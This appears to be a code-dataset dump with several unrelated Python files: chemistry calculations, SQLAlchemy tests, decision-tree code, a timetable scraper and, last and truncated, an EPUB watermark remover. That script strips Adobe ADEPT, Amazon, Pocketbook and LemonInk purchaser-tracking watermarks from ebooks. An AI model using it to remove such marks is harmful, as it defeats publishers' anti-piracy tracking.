'=>' in reaction\n assert isinstance(particle_enthalpy, dict)\n\n rcnt_str, prdt_str = re.split(r'\\s*[<]?[=][>]\\s*', reaction.strip())\n sum_H = lambda _list: sum(\n particle_enthalpy[particle] for particle in _list) if _list else 0.0\n get_H = lambda _str: sum_H(re.split(r'\\s+[+]\\s+', _str.strip()) if _str.strip() else [])\n return get_H(prdt_str) - get_H(rcnt_str)\n\n\n# ----------------------------------------------------------------------------------------------- #\ndef get_vib_energy(molecule, *, quantum_number, state='X', minimum_is_zero=False):\n \"\"\"\n Calculate the vibrational energy of molecule.\n\n Parameters\n ----------\n molecule : str\n The molecule name.\n quantum_number : int or tuple of int\n Quantum number. int for diatomic, (int,int,int) for triatomic.\n state : str, optional\n Electric state.\n minimum_is_zero : bool, optional\n Whether the minimum vibrational energy is set at zero.\n\n Returns\n -------\n vibrational energy : float\n Vibrational energy in unit of eV.\n\n \"\"\"\n assert molecule in molecular_const\n if molecule in ('CO', 'O2', 'N2', 'H2'):\n assert isinstance(quantum_number, int), quantum_number\n elif molecule in ('H2O', 'CO2'):\n assert isinstance(quantum_number, tuple), quantum_number\n assert len(quantum_number) == 3\n\n spe_const = molecular_const[molecule][state]\n lamb_diatomic = lambda c, v: const.WNcm2eV * (c['we'] * (v + 0.5) - c['wexe'] * (v + 0.5)**2 +\n c['weye'] * (v + 0.5)**3)\n lamb_triatomic = lambda c, v, n: const.WNcm2eV * sum([c['w1'] * (v[0] + n[0]),\n c['w2'] * (v[1] + n[1]),\n c['w3'] * (v[2] + n[2]),\n c['X11'] * (v[0] + n[0])**2,\n c['X22'] * (v[1] + n[1])**2,\n c['X33'] * (v[2] + n[2])**2,\n c['X12'] * (v[0] + n[0]) * (v[1] + n[1]),\n c['X13'] * (v[0] + n[0]) * (v[2] + n[2]),\n c['X23'] * (v[1] + n[1]) * (v[2] + n[2]),\n c['Xll'] * (v[1]**2 - 1)])\n\n def _get_vib_energy(mole, v):\n if mole in ('CO', 'O2', 'N2', 'H2'):\n return lamb_diatomic(spe_const, v), lamb_diatomic(spe_const, 0)\n elif mole == 'CO2':\n n = (1 / 2, 1, 1 / 2)\n return (lamb_triatomic(spe_const, v, n),\n lamb_triatomic(spe_const, (0, 0, 0), n))\n elif mole == 'H2O':\n n = (1 / 2, 1 / 2, 1 / 2)\n return (lamb_triatomic(spe_const, v, n),\n lamb_triatomic(spe_const, (0, 0, 0), n))\n else:\n raise MoleculeError(\"{}'s data is not imported.\".format(mole))\n\n if minimum_is_zero and (quantum_number == 0 or quantum_number == (0, 0, 0)):\n return 0.0\n if minimum_is_zero:\n return _get_vib_energy(molecule, quantum_number)[0] - \\\n _get_vib_energy(molecule, quantum_number)[1]\n else:\n return _get_vib_energy(molecule, quantum_number)[0]\n\n\n# ----------------------------------------------------------------------------------------------- #\n\nif __name__ == '__main__':\n pass\n","sub_path":"plasmistry/molecule/thermal_calculation.py","file_name":"thermal_calculation.py","file_ext":"py","file_size_in_byte":5551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"433938046","text":"# Without if stamnet can we write else statement ->\n\n\"\"\"\nThe else statement /block we can write along with conditional statemnets\nif and if - elif\n\nAnd alos\n\nwe can write along with iterative statements i.e for and while\n\"\"\"\n\n\n\nfor i in range(10):\n if (i==5):\n print(i)\n break\nelse:\n print(\"Success\")\n","sub_path":"class_examples/fnsummary/adhoc1.py","file_name":"adhoc1.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"64600966","text":"# This prototype uses the SQL Expression Language of SQLAlchemy\n# possibly we could have done the it simpler using the ORM\n# The purpose is however to identify the relational model\n\nimport unittest\nimport exampleModels\nfrom sqlalchemy import Table, Column, Integer, String, MetaData,ForeignKey,ForeignKeyConstraint\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.sql import select\nfrom sympy import Matrix,sympify,symbols,Symbol,IndexedBase\nfrom testinfrastructure.helpers import pe\nfrom createTables import createTables\nfrom sympy import Basic,Symbol,Matrix,symbols\nfrom sympy.vector import CoordSysND, Vector,express\nfrom helpers import (\n defaultOrderingName\n ,addModel\n ,resolve\n #,geometric_resolve\n #,symbolic_resolve\n #,resolveMatrix\n #,resolveVector\n ,addStateVariableOrdering\n ,getStateVector\n ,addDerivedVariable\n #,get_name_spaces\n ,getHighestExecutionOrder\n)\n\n\nclass TestIndexedVariables(unittest.TestCase):\n # We invent a minimal ecosystem model with 2 vegetation and 3 soil pools and write it \n # in block-matrix-form\n # .\n # ⎡⎡v_l⎤⎤ ⎡⎡ V_11, V_12⎤⎡VS_11,VS_12, VS_13⎤⎤ ⎡⎡v l⎤⎤ ⎡⎡I_l⎤⎤\n # ⎢⎣v_w⎦⎥ ⎢⎣ V_21, V_22⎦⎣VS_21,VS_22, VS_23⎦⎥ ⎢⎣v w⎦⎥ ⎢⎣I_w⎦⎥\n # ⎢ ⎥ ⎢ ⎥ ⎢ ⎥ ⎢ ⎥\n # ⎢⎡s_f⎤⎥ = ⎢⎡SV_11, SV_12⎤⎡ S_11, S_12, S_13⎤⎥ * ⎢⎡s f⎤⎥ +⎢⎡I_f⎤⎥\n # ⎢⎢s_s⎥⎥ ⎢⎢SV_21, SV_22⎥⎢ S_21, S_22, S_23⎥⎥ ⎢⎢s s⎥⎥ ⎢⎢I_s⎥⎥\n # ⎣⎣s_b⎦⎦ ⎣⎣SV_31, SV_32⎦⎣ S_31, S_32, S_33⎦⎦ ⎣⎣s b⎦⎦ ⎣⎣I_b⎦⎦\n # \n # The input to the vegetation is often written as a product of distribution vector b and a scalar u\n #\n # ⎡Il⎤ ⎡bl⎤\n # ⎢ ⎥ = ⎢ ⎥* u \n # ⎣Iw⎦ ⎣bw⎦\n #\n # and models are compared with respect to \\vec{b} or \\tens{V} \n # It is therefore desirable to be able to extract this information from the database.\n \n # On the other hand storing this information in the database \n # has to account for the fact that matrix and vector valued variables \n # depend on the ordering of the pools (the coordinate system), \n # although this is not relevant for the solution. \n \n # Furthermore different orderings are usefull for different purposes (clustering different soil levels or all microbial pools, or ..)\n # Therefore if we define tuple/or matrix valued variables we implicitly always define them along with an ordering of the state variables \n \n # The block-matrix-decomposition is NOT preserved under general permutations \n # of the order of state variables.(Only for those permutations inside blocks)\n # On the other hand sums and products of matrices ARE preserved under coordinate transformations. \n # In order to be able to retrieve the vegetation part after a variable transformation \n # (e.g. a permutation)\n # We could therefore write the above equation with full sized matrices and vectors as\n # . . .\n # ⎡v_l⎤ ⎡v_l⎤ ⎡ 0 ⎤ \n # ⎢v_w⎥ ⎢v_w⎥ ⎢ 0 ⎥ \n # ⎢ ⎥ = ⎢ ⎥ + ⎢ ⎥ \n # ⎢s_f⎥ ⎢ 0 ⎥ ⎢s_f⎥ \n # ⎢s_s⎥ ⎢ 0 ⎥ ⎢s_s⎥ \n # ⎣s_b⎦ ⎣ 0 ⎦ ⎣s_b⎦ \n \n # ⎡ ⎡ V_11, V_12 0 , 0 , 0 ⎤\n # ⎢ ⎢ V_21, V_22 0 , 0 , 0 ⎥\n # = ⎢ ⎢ 0 , 0 0 , 0 , 0 ⎥\n # ⎢ ⎢ 0 , 0 0 , 0 , 0 ⎥\n # ⎣ ⎣ 0 , 0 0 , 0 , 0 ⎦\n #\n # ⎡ 0 , 0 VS_11,VS_12, VS_13⎤ \n # ⎢ 0 , 0 VS_21,VS_22, VS_23⎥ \n # + ⎢ 0 , 0 0 , 0 , 0 ⎥ \n # ⎢ 0 , 0 0 , 0 , 0 ⎥ \n # ⎣ 0 , 0 0 , 0 , 0 ⎦ \n # \n # ⎡ 0 , 0 0 , 0 , 0 ⎤ \n # ⎢ 0 , 0 0 , 0 , 0 ⎥ \n # + ⎢SV_11, SV_12 0 , 0 , 0 ⎥ \n # ⎢SV_21, SV_22 0 , 0 , 0 ⎥ \n # ⎣SV_31, SV_32 0 , 0 , 0 ⎦ \n # \n # ��� 0 , 0 0 , 0 , 0 ⎤ ⎤ ⎡ ⎡v l⎤ ⎡ 0 ⎤ ⎤ \n # ⎢ 0 , 0 0 , 0 , 0 ⎥ ⎥ ⎢ ⎢v w⎥ ⎢ 0 ⎥ ⎥ \n # + ⎢ 0 , 0 S_11, S_12, S_13⎥ ⎥ * ⎢ ⎢ 0 ⎥ + ⎢s f⎥ ⎥ \n # ⎢ 0 , 0 S_21, S_22, S_23⎥ ⎥ ⎢ ⎢ 0 ⎥ ⎢s s⎥ ⎥ \n # ⎣ 0 , 0 S_31, S_32, S_33⎦ ⎦ ⎣ ⎣ 0 ⎦ ⎣s b⎦ ⎦ \n #\n # ⎡I_l⎤ ⎡ 0 ⎤\n # ⎢I_w⎥ ⎢ 0 ⎥\n # + ⎢ 0 ⎥ + ⎢I_f⎥\n # ⎢ 0 ⎥ ⎢I_s⎥\n # ⎣ 0 ⎦ ⎣I_b⎦\n #\n # These buildig blocks can be transformed in the usual way, e.g. \n # \n # in the default statevariable ordering we have\n #\n # ⎡ V_11, V_12, 0 , 0 , 0 ⎤\n # ⎢ V_21, V_22, 0 , 0 , 0 ⎥\n # V = ⎢ 0 , 0 , 0 , 0 , 0 ⎥\n # ⎢ 0 , 0 , 0 , 0 , 0 ⎥\n # ⎣ 0 , 0 , 0 , 0 , 0 ⎦\n # \n # after the permutaion we have: V'= P * V * P^-1, for instance (for a permutation P that\n # exchanges row 2 and 5 in the original statevector)\n # \n # ⎡ V_11, 0 , 0 , 0 , V_12 ⎤\n # ⎢ 0 , 0 , 0 , 0 , 0 ⎥\n # V'= ⎢ 0 , 0 , 0 , 0 , 0 ⎥\n # ⎢ 0 , 0 , 0 , 0 , 0 ⎥\n # ⎣ V_21, 0 , 0 , 0 , V_22 ⎦\n #\n # which still contains only vegetation related entries although it is not a block matrix anymore.\n \n # The purpose of these tests is to infer what kind of information we can retrieve depending \n # on the storage scheme we choose.\n def setUp(self):\n #engine = create_engine('sqlite:///:memory:', echo=True)\n #metadata = MetaData()\n\n metadata,engine=createTables()\n self.metadata=metadata\n self.engine=engine\n\n\n def test_scalar_invariants(self):\n # Take a coordinate independent scalar like the complete influx to the vegetation pools\n # \n # NetVegIn=I_l+I_w\n # \n # Since we store expressions as strings a user could by means of some indexed variables\n # \n # I =Matrix([I_l,I_w,I_f,I_s,I_b]) \n # \n # NetVegIn=I[0]+I[1]\n #\n # The indices 0 and 1 are only correct for coordinate systems where I_l and I_w are the first\n # two components. This has the following implications\n # 1.) We have to store the coordinate system along with the variables\n # 2.) All expressions that depend on an indexed expression are only valid in the original coordinate \n # system and must therefore be executed there to get the value\n\n metadata=self.metadata\n engine=self.engine\n model_id='default_2'\n exampleModels.addFivePoolModel(metadata,engine,model_id,'matrix test')\n \n addDerivedVariable(\n metadata\n ,engine\n ,model_id\n ,symbol='I'\n ,description='net influx to vegetation pools'\n ,expression='Matrix([Ivl,Ivw,0,0,0])' \n ,execution_order=22\n ,coord_system_id=defaultOrderingName\n \n )\n addDerivedVariable(\n metadata\n ,engine\n ,model_id=model_id\n ,symbol='NetVegIn'\n ,description='Input tuple'\n ,expression='sum(I[0:2])'\n ,execution_order=23\n ,coord_system_id=defaultOrderingName\n \n )\n\n res_0 = resolve(metadata,engine,\"NetVegIn\",model_id,coord_system_id=defaultOrderingName)\n\n my_ordering_name='veg_2'\n\n addStateVariableOrdering(metadata,engine,model_id,state_variable_symbols=[ \"sb\", \"vl\",\"sf\", \"ss\",\"vw\"],coord_system_id=my_ordering_name)\n res_1 = resolve(metadata,engine,\"NetVegIn\",model_id,coord_system_id=my_ordering_name)\n self.assertEqual(res_0,res_1)\n\n # now assume that the target variable has NOT been defined with respect to the same coordinate system as the variables it depends on\n\n # we have to make sure that we get an exception if we try\n\n \n addDerivedVariable(\n metadata\n ,engine\n ,model_id=model_id\n ,symbol='NetVegIn2'\n ,description='cummulative Input to all vegetation pools'\n ,expression='sum(I[1]+I[4])'\n ,execution_order=23\n ,coord_system_id=my_ordering_name\n \n )\n with self.assertRaises(Exception) as e:\n res_1 = resolve(metadata,engine,\"NetVegIn2\",model_id,coord_system_id=my_ordering_namea)\n\n \n def test_vector_component_transformation(self):\n # Take a vectr like the influx to the model \n # \n # The components may be given by a matrix\n # \n # I =Matrix([I_l,I_w,I_f,I_s,I_b]) \n # \n\n metadata=self.metadata\n engine=self.engine\n model_id='default_2'\n exampleModels.addFivePoolModel(metadata,engine,model_id,'matrix test')\n \n addDerivedVariable(\n metadata\n ,engine\n ,model_id\n ,symbol='I'\n ,description='influx vector components'\n ,expression='Matrix([Ivl,Ivw,0,0,0])' \n ,execution_order=22\n ,coord_system_id=defaultOrderingName\n \n )\n # We can resolve it in any coordinate system if we know the transformation of the base vectors\n # (which in our case will be a permutation)\n res_0 = resolve(metadata,engine,\"I\",model_id,coord_system_id=defaultOrderingName)\n self.assertEqual(res_0,sympify('Matrix([Ivl,kIvw*vw,0,0,0])')) \n\n # we add a permutation \n my_ordering_name='veg_2'\n addStateVariableOrdering(metadata,engine,model_id,state_variable_symbols=[ \"sb\", \"vl\",\"sf\", \"ss\",\"vw\"],coord_system_id=my_ordering_name)\n res_1 = resolve(metadata,engine,\"I\",model_id,coord_system_id=my_ordering_name)\n self.assertEqual(res_1,sympify('Matrix([0,Ivl,0,0,kIvw*vw])'))\n\n # now assume that the target variable is not a columnvector of size n \n # or a matrix of size nxn\n\n # we have to make sure that we get an exception if we try to transform \n # something of this kind\n addDerivedVariable(\n metadata\n ,engine\n ,model_id\n ,symbol='Iveg'\n ,description='net influx to vegetation pools'\n ,expression='Matrix([Ivl,Ivw])' \n ,execution_order=23\n ,coord_system_id=defaultOrderingName\n \n )\n with self.assertRaises(Exception) as e:\n res_1 = resolve(metadata,engine,\"Iveg\",model_id,coord_system_id=my_ordering_namea)\n\n\n \n\n\n \n","sub_path":"prototypes/databases/SQLAlchemy/Schema2/TestIndexedExpression.py","file_name":"TestIndexedExpression.py","file_ext":"py","file_size_in_byte":11734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"432155826","text":"import pandas as pd\nimport numpy as np\n\n\n# 计算熵\ndef entropy(x, m):\n\ttemp = float(x/m)\n\treturn -temp*np.log2(temp)\n\n# 计算样本经验熵\ndef emp_entropy(data):\n\tclass_nums = data.groupby(data.iloc[:, -1]).size().values\n\tm ,n = data.shape\n\tH_D = np.sum(entropy(x, m) for x in class_nums)\n\treturn H_D\n\n# 计算经验条件熵\ndef entropy_condition(data, n_split):\n\ttotal_len = len(data)\n\tnum_class = set(data.iloc[:, n_split])\n\tcondition_entropy = 0\n\tfor part in num_class:\n\t\tsub_data = data[data.iloc[:, n_split] == part]\n\t\tsub_classes = sub_data.groupby(sub_data.iloc[:, -1]).size().values\n\t\tsub_len = len(sub_data)\n\t\tsub_sum = np.sum(entropy(x, sub_len) for x in sub_classes)\n\t\tcondition_entropy += (sub_len / total_len) * sub_sum\n\n\treturn condition_entropy\n\n# 计算基尼系数\ndef gini(data):\n\tclasses = data.groupby([data.iloc[:,-1]]).size().values\n\tm, n = data.shape\n\tgini = 1.0 - np.sum((x/m)**2 for x in classes)\n\treturn gini\n\t\t\t\t\n# 计算每一列最小基尼系数分割点\ndef gini_col(data):\n\tm, n = data.shape\n\tcol_split = {}\n\tfor col in range(n-1):\n\t\tpoint_split = list(set(data.iloc[:, col]))\n\t\tgini_list = []\n\t\tfor num in point_split:\n\t\t\tdata_left = data[data.iloc[:, col] <= num]\n\t\t\tdata_right = data[data.iloc[:, col] > num]\n\t\t\tdata_gini = data_left.shape[0]/m * gini(data_left) + data_right.shape[0]/m * gini(data_right)\n\t\t\tgini_list.append(data_gini)\n\n\t\tmin_gini = min(gini_list)\n\t\tindex_min = gini_list.index(min_gini)\n\t\tcol_split[col] = [point_split[index_min], min_gini]\n\n\tmin_split_col = min(col_split.items(), key=lambda x: x[1][1])\n\treturn min_split_col[0], min_split_col[1][0], min_split_col[1][1]\n\n# CART 算法\ndef cart_tree(data, labels='labels'):\n\t# 如果结果都是同一类,停止\n\tif data.groupby(labels).size()[0] == len(data):\n\t\treturn data[labels].values[0]\n\t# 如果只剩一列,停止:\n\tif len(data.columns) == 1:\n\t\treturn data.groupby(labels).size().sort_values().index[-1]\n\n\t# 选取gini系数最小的特征\n\ttree_labels = data.columns.values\n\tbest_split_col, best_split_point, best_split_gini = gini_col(data)\n\tif best_split_gini < 0.001:\n\t\treturn data.groupby(labels).size().sort_values().index[-1]\n\n\tif len(data.iloc[:, best_split_col]) == 1:\n\t\treturn data[labels].values[0]\n\n\tbest_tree_labels = tree_labels[best_split_col]\n\tkey = best_tree_labels + ':' + str(best_split_point)\n\tdecision_tree = {key: {}}\n\n\tdata_left = data[data[best_tree_labels] <= best_split_point]\n\tdecision_tree[key][0] = cart_tree(data_left, labels='labels')\n\tdata_right = data[data[best_tree_labels] > best_split_point]\n\tdecision_tree[key][1] = cart_tree(data_right, labels='labels')\n\n\t\n\n\treturn decision_tree\n\n\n# 选取最大增益\ndef choose_best_feature(data, method='ID3'):\n\tm, n = data.shape\n\t\n\tif method == 'ID3':\n\t\tentropy_split = [entropy_condition(data, n_split) for n_split in range(n-1)]\n\t\treturn entropy_split.index(max(entropy_split))\n\telif method == 'C4.5':\n\t\tentropy_split = [np.sum(entropy(item, m) for item in data.groupby(data.iloc[:, n_split]).size().values) for \n\t\t n_split in range(n-1)]\n\t\treturn entropy_split.index(max(entropy_split))\n\n# ID3/C4.5算法\ndef create_tree(data, labels='labels', method='ID3'): \n\n\t# 如果结果都是同一类,停止\n\tif data.groupby(labels).size()[0] == len(data):\n\t\treturn data[labels].values[0]\n\t# 如果只剩一列,停止:\n\tif len(data.columns) == 1:\n\t\treturn data.groupby(labels).size().sort_values().index[-1]\n\n\t# 选取信息增益最大的特征\n\ttree_labels = data.columns.values\n\tbest_split = choose_best_feature(data, method)\n\tbest_tree_labels = tree_labels[best_split]\n\tdecision_tree = {best_tree_labels: {}}\n\tfeatures = set(data[best_tree_labels])\n\t\n\n\tfor item in features:\n\t\tsub_data = data[data[best_tree_labels]==item]\n\t\t\n\t\tsub_data.drop([best_tree_labels], axis=1, inplace=True)\n\t\tdecision_tree[best_tree_labels][item] = create_tree_id3(sub_data, labels='labels')\n\n\treturn decision_tree\n\n\t\n\n\nif __name__ == '__main__':\n\tdata = pd.read_csv('iris.data', header=None)\n\tdata.columns = ['Sepal.Length', 'Sepal.Width', 'Petal.Length', 'Petal.Width', 'labels']\n\tclass_names = ['Iris Setosa', 'Iris Versicolour', 'Iris Virginica']\n\t# H_D = emp_entropy(data, labels='labels')\n\ttest = entropy_condition(data, 1)\n\t\n\t# print(create_tree(data, method='C4.5'))\n\tprint(cart_tree(data))\n\n","sub_path":"DecisionTree_classfy.py","file_name":"DecisionTree_classfy.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"47290400","text":"from business_rules.actions import BaseActions, rule_action\nfrom business_rules.fields import FIELD_TEXT\nfrom business_rules.variables import BaseVariables, boolean_rule_variable\nfrom business_rules.engine import run_all_with_results\nfrom . import TestCase\n\n\nclass ActionsResultsClassTests(TestCase):\n \"\"\" Test methods on getting fired rules actions results\n \"\"\"\n def test_get_actions_results(self):\n class SomeVariables(BaseVariables):\n @boolean_rule_variable\n def this_is_rule_1(self):\n return True\n\n @boolean_rule_variable\n def this_is_rule_2(self):\n return False\n\n class SomeActions(BaseActions):\n\n @rule_action(params={'foo':FIELD_TEXT})\n def some_action_1(self, foo):\n return foo\n\n @rule_action(params={'foobar':FIELD_TEXT})\n def some_action_2(self, foobar):\n return foobar\n\n @rule_action()\n def some_action_3(self):\n pass\n \n rule1 = {'conditions': {'all': [\n {\n 'name': 'this_is_rule_1',\n 'value': True,\n 'operator': 'is_true'\n }]},\n 'actions': [\n {'name': 'some_action_1',\n 'params': {'foo': 'fooValue'}\n }]}\n rule2 = {'conditions': {'all': [\n {\n 'name': 'this_is_rule_2',\n 'value': True,\n 'operator': 'is_false'\n }]},\n 'actions': [\n {'name': 'some_action_2',\n 'params': {'foobar': 'foobarValue'}\n },\n {'name': 'some_action_3'\n }]}\n\n variables = SomeVariables()\n actions = SomeActions()\n result = run_all_with_results([rule1, rule2], variables, actions)\n self.assertEqual(result, [{'some_action_1': 'fooValue'}, {'some_action_2': 'foobarValue'}])\n","sub_path":"tests/test_get_actions_results.py","file_name":"test_get_actions_results.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"19540269","text":"import requests\nimport argparse\nfrom lxml import html\n\n\ndef get_me_stuf(page):\n tree = html.fromstring(page.text)\n dates = tree.xpath(\"//table[@class='results']/tbody/tr[1]/td[2]/text()\")\n departures = tree.xpath(\"//table[@class='results']/tbody/tr[1]/td[5]/text()\")\n stations = tree.xpath(\"//table[@class='results']/tbody/tr[1]/td[3]/text()\")\n vehicles = tree.xpath(\"//table[@class='results']/tbody/tr[1]/td[7]/img[1]/@title\")\n\n end_station = tree.xpath(\"//table[@class='results']/tbody/tr[position() = (last()-1)]/td[3]/text()\")\n arrivals = tree.xpath(\"//table[@class='results']/tbody/tr[position() = (last()-1)]/td[4]/text()\")\n\n #arrivals = tree.xpath(\"//table[@class='results']/tbody/tr/td[starts-with(@class, 'suppress']/text()\")\n #departures = tree.xpath(\"//table[@class='results']/tbody/tr/td[starts-with(@class, 'suppress']/following-sibling/text()\")\n return dates, departures, stations, vehicles, arrivals, end_station\n\n\n\nparser = argparse.ArgumentParser(description='Description of your program')\nparser.add_argument('-f','--dfrom', help='Destination from', required=True)\nparser.add_argument('-t','--dto', help='Destination to', required=True)\nargs = parser.parse_args()\n\nd_from = args.dfrom\nd_to = args.dto\n\n\nsession = requests.Session()\n\ntokenRequest = session.get('https://cp.hnonline.sk/vlakbusmhd/spojenie/')\ntree = html.fromstring(tokenRequest.text)\n#headers = tokenRequest.headers\n\nelements = tree.xpath(\"//*[starts-with(@id, '__')]/@id\")\nvals = tree.xpath(\"//*[starts-with(@id, '__')]/@value\")\ndictionary = dict(zip(elements, vals))\n\n\nsome_stuff = {'ctl00$cDM$cF$0t': d_from,\n 'ctl00$cDM$cF$0h': d_from,\n 'ctl00$cDM$cT$0t': d_to,\n 'ctl00$cDM$cT$0h': d_to,\n 'IsDepTime': 'true',\n 'ctl00$cDM$cSB$cmdSearch': \"Hľadať\"}\n\npayload = {**some_stuff, ** dictionary}\n\nres = session.post('https://cp.hnonline.sk/vlakbusmhd/spojenie/', data=payload)\n\n\nprint(get_me_stuf(res))\n\n\n#print(res.text)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"52203958","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# epubwatermark.py\n# Copyright © 2021 NoDRM\n\n# Revision history:\n# 1.0 - Initial version\n\n# Released under the terms of the GNU General Public Licence, version 3\n# \n\n\"\"\"\nRemoves various watermarks from EPUB files\n\"\"\"\n\nimport traceback\nfrom zipfile import ZipInfo, ZipFile, ZIP_STORED, ZIP_DEFLATED\nfrom zeroedzipinfo import ZeroedZipInfo\nfrom contextlib import closing\nfrom lxml import etree\nimport re\n\n# Runs a RegEx over all HTML/XHTML files to remove watermakrs.\ndef removeHTMLwatermarks(object, path_to_ebook):\n try: \n inf = ZipFile(open(path_to_ebook, 'rb'))\n namelist = inf.namelist()\n\n modded_names = []\n modded_contents = []\n\n count_adept = 0\n count_pocketbook = 0\n count_lemonink_invisible = 0\n count_lemonink_visible = 0\n lemonink_trackingID = None\n\n for file in namelist:\n if not (file.endswith('.html') or file.endswith('.xhtml') or file.endswith('.xml')):\n continue\n\n try:\n file_str = inf.read(file).decode(\"utf-8\")\n str_new = file_str\n\n # Remove Adobe ADEPT watermarks\n # Match optional newline at the beginning, then a \"meta\" tag with name = \"Adept.expected.resource\" or \"Adept.resource\"\n # and either a \"value\" or a \"content\" element with an Adobe UUID\n pre_remove = str_new\n str_new = re.sub(r'((\\r\\n|\\r|\\n)\\s*)?\\', '', str_new)\n str_new = re.sub(r'((\\r\\n|\\r|\\n)\\s*)?\\', '', str_new)\n\n if (str_new != pre_remove):\n count_adept += 1\n\n # Remove Pocketbook watermarks\n pre_remove = str_new\n str_new = re.sub(r'\\
(.*?)\\<\\/div\\>', '', str_new)\n\n if (str_new != pre_remove):\n count_pocketbook += 1\n\n\n # Remove eLibri / LemonInk watermark\n # Run this in a loop, as it is possible a file has been watermarked twice ...\n while True: \n pre_remove = str_new\n unique_id = re.search(r']+class=\"[^\"]*(t0x[0-9a-fA-F]{25})[^\"]*\"[^>]*>', str_new)\n if (unique_id):\n lemonink_trackingID = unique_id.groups()[0]\n count_lemonink_invisible += 1\n str_new = re.sub(lemonink_trackingID, '', str_new)\n pre_remove = str_new\n pm = r'(]+class=\"[^\"]*\"[^>]*>)'\n pm += r'\\
(.*?)
'\n pm += r'\\
(.*?)
'\n str_new = re.sub(pm, r'\\1', str_new)\n\n if (str_new != pre_remove):\n count_lemonink_visible += 1\n else: \n break\n\n except:\n traceback.print_exc()\n continue\n\n if (file_str == str_new):\n continue\n\n modded_names.append(file)\n modded_contents.append(str_new)\n\n \n if len(modded_names) == 0:\n # No file modified, return original\n return path_to_ebook\n\n if len(modded_names) != len(modded_contents):\n # Something went terribly wrong, return original\n print(\"Watermark: Error during watermark removal\")\n return path_to_ebook\n\n # Re-package with modified files:\n namelist.remove(\"mimetype\")\n\n try: \n output = object.temporary_file(\".epub\").name\n kwds = dict(compression=ZIP_DEFLATED, allowZip64=False)\n with closing(ZipFile(open(output, 'wb'), 'w', **kwds)) as outf:\n for path in ([\"mimetype\"] + namelist):\n\n data = inf.read(path)\n \n try: \n modded_index = None\n modded_index = modded_names.index(path)\n except:\n pass\n\n if modded_index is not None:\n # Found modified file - replace contents\n data = modded_contents[modded_index]\n\n zi = ZipInfo(path)\n oldzi = inf.getinfo(path)\n try: \n zi.compress_type = oldzi.compress_type\n if path == \"mimetype\":\n zi.compress_type = ZIP_STORED\n zi.date_time = oldzi.date_time\n zi.comment = oldzi.comment\n zi.extra = oldzi.extra\n zi.internal_attr = oldzi.internal_attr\n zi.external_attr = oldzi.external_attr\n zi.volume = oldzi.volume\n zi.create_system = oldzi.create_system\n zi.create_version = oldzi.create_version\n\n if any(ord(c) >= 128 for c in path) or any(ord(c) >= 128 for c in zi.comment):\n # If the file name or the comment contains any non-ASCII char, set the UTF8-flag\n zi.flag_bits |= 0x800\n except:\n pass\n\n # Python 3 has a bug where the external_attr is reset to `0o600 << 16`\n # if it's NULL, so we need a workaround:\n if zi.external_attr == 0: \n zi = ZeroedZipInfo(zi)\n\n\n outf.writestr(zi, data)\n except:\n traceback.print_exc()\n return path_to_ebook\n\n if (count_adept > 0):\n print(\"Watermark: Successfully stripped {0} ADEPT watermark(s) from ebook.\".format(count_adept))\n \n if (count_lemonink_invisible > 0 or count_lemonink_visible > 0):\n print(\"Watermark: Successfully stripped {0} visible and {1} invisible LemonInk watermark(s) (\\\"{2}\\\") from ebook.\"\n .format(count_lemonink_visible, count_lemonink_invisible, lemonink_trackingID))\n \n if (count_pocketbook > 0):\n print(\"Watermark: Successfully stripped {0} Pocketbook watermark(s) from ebook.\".format(count_pocketbook))\n\n return output\n\n except:\n traceback.print_exc()\n return path_to_ebook\n \n\n\n\n# Finds the main OPF file, then uses RegEx to remove watermarks\ndef removeOPFwatermarks(object, path_to_ebook):\n contNS = lambda tag: '{%s}%s' % ('urn:oasis:names:tc:opendocument:xmlns:container', tag)\n opf_path = None\n\n try:\n inf = ZipFile(open(path_to_ebook, 'rb'))\n container = etree.fromstring(inf.read(\"META-INF/container.xml\"))\n rootfiles = container.find(contNS(\"rootfiles\")).findall(contNS(\"rootfile\"))\n for rootfile in rootfiles: \n opf_path = rootfile.get(\"full-path\", None)\n if (opf_path is not None):\n break\n except: \n traceback.print_exc()\n return path_to_ebook\n\n # If path is None, we didn't find an OPF, so we probably don't have a font key.\n # If path is set, it's the path to the main content OPF file.\n\n if (opf_path is None):\n # No OPF found - no watermark\n return path_to_ebook\n else:\n try:\n container_str = inf.read(opf_path).decode(\"utf-8\")\n container_str_new = container_str\n\n had_amazon = False\n had_elibri = False\n\n # Remove Amazon hex watermarks\n # Match optional newline at the beginning, then spaces, then a \"meta\" tag with name = \"Watermark\" or \"Watermark_(hex)\" and a \"content\" element.\n # This regex also matches DuMont watermarks with meta name=\"watermark\", with the case-insensitive match on the \"w\" in watermark.\n pre_remove = container_str_new\n container_str_new = re.sub(r'((\\r\\n|\\r|\\n)\\s*)?\\', '', container_str_new)\n container_str_new = re.sub(r'((\\r\\n|\\r|\\n)\\s*)?\\', '', container_str_new)\n if pre_remove != container_str_new:\n had_amazon = True\n\n # Remove elibri / lemonink watermark\n # Lemonink replaces all \"id\" fields in the opf with \"idX_Y\", with X being the watermark and Y being a number for that particular ID.\n # This regex replaces all \"idX_Y\" IDs with \"id_Y\", removing the watermark IDs.\n pre_remove = container_str_new\n container_str_new = re.sub(r'((\\r\\n|\\r|\\n)\\s*)?\\<\\!\\-\\-\\s*Wygenerowane przez elibri dla zamówienia numer [0-9a-fA-F]+\\s*\\-\\-\\>', '', container_str_new)\n if pre_remove != container_str_new:\n # To prevent this Regex from applying to books without that watermark, only do that if the watermark above was found.\n container_str_new = re.sub(r'\\=\\\"id[0-9]+_([0-9]+)\\\"', r'=\"id_\\1\"', container_str_new)\n if pre_remove != container_str_new:\n had_elibri = True\n\n except:\n traceback.print_exc()\n return 